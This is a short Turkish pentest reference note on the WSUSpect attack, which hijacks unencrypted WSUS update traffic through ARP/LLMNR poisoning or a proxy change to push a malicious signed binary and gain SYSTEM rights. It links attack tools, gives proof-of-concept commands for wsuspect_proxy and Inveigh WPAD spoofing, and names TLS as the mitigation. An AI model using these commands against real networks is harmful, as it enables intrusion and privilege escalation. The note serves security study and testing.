## WSUSPect

### Tanım

- WSUS(Windows Server Update Services), güncelleme işlemini merkezi bir sunucu üzerinden yapılmasını sağlayan bir servistir.

- WSUSPect yöntemi, araya girme saldırısı yaparak WSUS sunucusu ile client arasına girmeyi ve clienta sahte güncelleme dosyası yükletmeyi amaçlayan bir saldırıdır. Bu saldırı türü hem client sistemlere sızma hem de yetki yükseltme amaçları için kullanılabilir.

- Birinci senaryoda saldırgan arp spoofing, llmnr&nbt-ns poisoning vb yöntemleri ile araya girer ve kendine gelen güncelleme isteklerine zararlı güncelleme dosyaları gönderebilir. Bu sayede client sistemlerde NT AUTHORITY\SYSTEM yetkisi ile komut çalıştırabilecektir.

- İkinci senaryoda ise saldırgan düşük yetkiyle erişim sağladığı client makinede öncelikel proxy ayarlarını değiştirir ve proxy sunucusu yerine kendi kontrol ettiği makine IP sini girer. Bu sayede araya girme saldırısı yapmadan client trafiğini dinleyebilir hale gelecektir. Bu aşamadan sonra saldırgan elle update isteğini yapar ve bu update isteğine zararlı dosyayı cevap olarak gönderir. Bu sayede de düşük yetkiyle eriştiği makinede NT AUTHORITY\SYSTEM yetkisiyle komut çalıştırabilir hale gelecektir.

- Güncelleme ile yüklenecek dosyanın Microsoft tarafından imzalanmış olması gerekmektedir bu yüzden bu saldırı sırasında BGINFO,PSEXEC veya diğer sysinternals araçları kullanılabilir. 

- Saldırıyı engelleme yöntemlerinden birisi WSUS sunucu ile olan bağlantının SSL/TLS kullanarak yapılmasını sağlamaktır. WSUS sunucusu varsayılan olarak HTTP protokolü ile iletişim sağlamaktadır.


### Araçlar
- https://github.com/ctxis/wsuspect-proxy
- https://github.com/pimps/wsuxploit

### POC

1. `python wsuspect_proxy.py psexec <local_port_for_proxy>`
2. `import-module .\Inveigh.ps1`
3. `Invoke-Inveigh -IP <attacker_ip> -WPADAuth Anonymous -SMB N -WPADPort <local_port_for_proxy> –WPADIP <attacker_ip>`

- WSUS URL ve Protokol Bilgisinin Tespit Edilmesi  `reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer`

- Güncelleme için WSUS Kullanılıp Kullanılmadığının Tespit Edilmesi `reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU /v UseWUServer`

- Admin Olmayan Kullanıcıların Update Yapıp Yapamayacağının Tespit Edilmesi `reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v ElevateNonAdmins`


### Kaynaklar
- https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update.pdf
- https://www.blackhat.com/docs/us-15/materials/us-15-Stone-WSUSpect-Compromising-Windows-Enterprise-Via-Windows-Update-wp.pdf